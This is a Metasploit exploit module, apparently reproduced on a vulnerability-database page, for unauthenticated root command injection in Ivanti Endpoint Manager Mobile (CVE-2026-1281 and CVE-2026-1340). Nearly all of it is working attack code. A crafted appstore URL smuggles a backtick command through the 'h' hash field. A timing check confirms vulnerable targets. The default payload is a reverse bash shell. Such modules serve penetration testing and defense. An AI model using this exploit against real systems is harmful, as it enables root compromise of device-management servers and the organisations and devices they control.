##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/stopwatch'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Ivanti Endpoint Manager Mobile (EPMM) unauthenticated RCE',
'Description' => %q{
This module exploits a OS command injection issue in Ivanti Endpoint Manager Mobile (EPMM), formerly known
as MobileIron. A remote attacker can achieve unauthenticated RCE with root privileges on an affected device.
},
'License' => MSF_LICENSE,
'Author' => [
'watchTowr', # Original analysis and PoC
'sfewer-r7' # MSF module
],
'References' => [
['CVE', '2026-1281'],
['CVE', '2026-1340'],
# Vendor advisory
['URL', 'https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US'],
# Vendor guidance
['URL', 'https://forums.ivanti.com/s/article/Analysis-Guidance-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US'],
# Technical analysis & PoC
['URL', 'https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/']
],
'DisclosureDate' => '2026-01-29',
'Privileged' => true, # Executes as root.
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD,
'Targets' => [
[
# Successfully tested with the following payloads against MobileIron 11.2:
# cmd/unix/reverse_bash
# cmd/unix/reverse_netcat
# NOTE: The Linux fetch payloads did not work on MobileIron 11.2, YMMV on later product versions.
'Default', {
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash',
'FETCH_WRITABLE_DIR' => '/tmp'
}
}
],
],
'Payload' => {
'BadChars' => '`'
},
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([OptString.new('TARGETURI', [true, 'Base path', '/'])])
end
def check
res_ver = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mifs', 'user', 'login.jsp')
)
return CheckCode::Unknown('Connection to /mifs/user/login.jsp failed') unless res_ver
return CheckCode::Unknown("Unexpected /mifs/user/login.jsp response code #{res_ver.code}") unless res_ver.code == 200
ver_match = res_ver.body.match(/ui\.login\.css\?([\d.]+)"/)
return CheckCode::Unknown('Failed to version match on ui.login.css') unless ver_match
product_name = 'EPMM'
# Ivanti acquired MobileIron and rebranded it to Endpoint Manager Mobile (EPMM) around version 11.4.
if Rex::Version.new(ver_match[1]) < Rex::Version.new('11.4.0.0')
product_name = 'MobileIron'
end
version_string = "Detected Ivanti #{product_name} version #{ver_match[1]}"
sleep_time = rand(4..8)
# We use proof-of-execution in the form of a delay to confirm if a target is vulnerable.
res, elapsed_time = Rex::Stopwatch.elapsed_time do
execute_cmd("sleep #{sleep_time}")
end
return CheckCode::Unknown("#{version_string}. Connection failed") unless res
if elapsed_time < sleep_time
return CheckCode::Safe(version_string)
end
CheckCode::Vulnerable(version_string)
end
def exploit
execute_cmd(payload.encoded)
end
def execute_cmd(cmd)
elements = {
'kid' => rand(32),
'st' => 'theValue'.ljust(10), # A length check in EPMM requires this value to be 10 characters long.
'et' => (Time.now + (60 * 60 * rand(24))).to_i,
'h' => "gPath[`#{cmd}`]"
}
hash = 'sha256:'
hash += elements.map { |k, v| "#{k}=#{Rex::Text.uri_encode(v.to_s, 'hex-noslashes')}" }.join(',')
vprint_status("hash: #{hash}")
send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(
target_uri.path,
'mifs',
'c',
'appstore',
'fob',
'3',
rand(1024).to_s,
hash,
"#{SecureRandom.uuid}.ipa"
)
)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation